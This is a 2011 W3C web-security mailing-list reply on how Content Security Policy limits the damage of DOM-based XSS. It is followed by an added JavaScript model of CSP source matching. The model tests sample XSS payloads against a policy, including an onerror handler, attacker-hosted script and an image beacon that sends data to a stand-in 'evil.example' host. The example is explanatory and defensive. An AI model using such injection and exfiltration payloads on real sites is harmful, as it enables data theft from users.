- From: Devdatta Akhawe <dev.akhawe@gmail.com>
- Date: Thu, 24 Feb 2011 21:04:50 -0800
- To: gaz Heyes <gazheyes@gmail.com>
- Cc: Daniel Veditz <dveditz@mozilla.com>, public-web-security@w3.org
> Trouble is "important_variable" could be tainted with malicious data and the
> user defined function might use it in some way with a DOM function and if
> your user defined function can't use the DOM or anything then what use is
> the user defined function?

Yes. I am not saying it won't have problems. But with the rest of the CSP lockdowns (limits on external scripts being sourced, limits on arbitrary inline scripts), it might be that the amount of bad things an attacker can do is limited.

For example, even with the full-inline-scripts-totally-off CSP switched on, a page could still have broken JavaScript that is vulnerable to DOM-based XSS -- the hope is that with CSP the amount of badness that the DOM-based XSS could achieve is limited.

=devdatta
Received on Friday, 25 February 2011 06:00:56 UTC
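The point made in the message above, that CSP bounds what a DOM-based XSS can still do rather than preventing it, as an added example that is not part of the original thread. It is a small, deliberately simplified JavaScript model of CSP source matching and checks a few constructed attacker payloads against a policy. The origins (app.example, evil.example, cdn.example), the payloads and the reduced matching rules (no port or path matching, no nonces or hashes) are assumptions of this example, not anything from the thread or a browser's implementation.

```javascript
// Added example, not from the mailing-list thread: a deliberately simplified
// model of CSP source matching, used to show which attacker actions survive a
// DOM-based XSS once inline and cross-origin scripts are locked down.
// Assumptions (not from the thread): the origins app.example, evil.example and
// cdn.example, the sample payloads, and the reduced matching rules below
// (no port or path matching, no nonces/hashes), which are NOT a browser's CSP
// implementation.

// The vulnerable sink this models: attacker-controlled markup reaches the DOM
// without sanitisation, e.g.
//   document.getElementById('out').innerHTML = location.hash.slice(1);
// CSP does not fix that bug; it only constrains what the injected markup can do.

// Parse "script-src 'self' https://cdn.example; img-src *" into a Map.
// Per CSP, a repeated directive name is ignored after its first occurrence.
function parsePolicy(policy) {
  const directives = new Map();
  for (const raw of policy.split(';')) {
    const tokens = raw.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    const key = name.toLowerCase();
    if (!directives.has(key)) directives.set(key, sources);
  }
  return directives;
}

// Fetch directives that are absent fall back to default-src; if that is absent
// too, the load is unrestricted (null signals "no policy applies").
function sourcesFor(directives, name) {
  if (directives.has(name)) return directives.get(name);
  if (directives.has('default-src')) return directives.get('default-src');
  return null;
}

// Does one source expression match a URL? Handles 'none', '*', 'self',
// scheme-only ("https:") and host expressions with an optional scheme prefix
// and an optional leading "*." (which requires at least one subdomain label).
function matchesSource(expr, url, pageOrigin) {
  if (expr === "'none'") return false;
  if (expr === '*') return true;
  const target = new URL(url);
  if (expr === "'self'") return target.origin === pageOrigin;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) return target.protocol === expr.toLowerCase();
  let scheme = null;
  let host = expr;
  const m = expr.match(/^([a-z][a-z0-9+.-]*):\/\/(.+)$/i);
  if (m) {
    scheme = m[1].toLowerCase() + ':';
    host = m[2];
  }
  if (scheme && target.protocol !== scheme) return false;
  if (host.startsWith('*.')) {
    const suffix = host.slice(1).toLowerCase();
    return target.hostname.endsWith(suffix) && target.hostname.length > suffix.length;
  }
  return target.hostname === host.toLowerCase();
}

// Would the policy allow loading `url` under fetch directive `name`?
function allowsLoad(directives, name, url, pageOrigin) {
  const sources = sourcesFor(directives, name);
  if (sources === null) return true;
  return sources.some((s) => matchesSource(s, url, pageOrigin));
}

// Inline <script> bodies and inline event handlers run only with 'unsafe-inline'.
function allowsInlineScript(directives) {
  const sources = sourcesFor(directives, 'script-src');
  if (sources === null) return true;
  return sources.includes("'unsafe-inline'");
}

// What can an attacker who controls markup in a page at `pageOrigin` still do
// under `policy`? Each entry is one constructed payload the XSS could inject.
function residualCapabilities(policy, pageOrigin) {
  const d = parsePolicy(policy);
  return {
    // <img src=x onerror="..."> : needs inline script execution
    inlineHandler: allowsInlineScript(d),
    // <script src="https://evil.example/x.js"> : cross-origin script
    externalScript: allowsLoad(d, 'script-src', 'https://evil.example/x.js', pageOrigin),
    // <script src="/api/jsonp?cb=..."> : a same-origin "gadget" still loads under 'self'
    sameOriginScript: allowsLoad(d, 'script-src', pageOrigin + '/api/jsonp?cb=steal', pageOrigin),
    // <img src="https://evil.example/steal?d=..."> : exfiltration beacon
    imageBeacon: allowsLoad(d, 'img-src', 'https://evil.example/steal?d=1', pageOrigin),
    // A fake login form or defaced text is plain markup; CSP does not govern it.
    markupInjection: true,
  };
}
```

Running residualCapabilities with no policy reports every capability as available; with "default-src 'self'" the injected markup can no longer run inline handlers, pull in attacker-hosted script, or beacon data out through an image, but it can still inject arbitrary markup and still load same-origin scripts, which is exactly the residual "badness" the message above expects CSP to shrink rather than remove. Real browsers apply the full source-expression grammar (ports, paths, nonces, hashes) that this model leaves out.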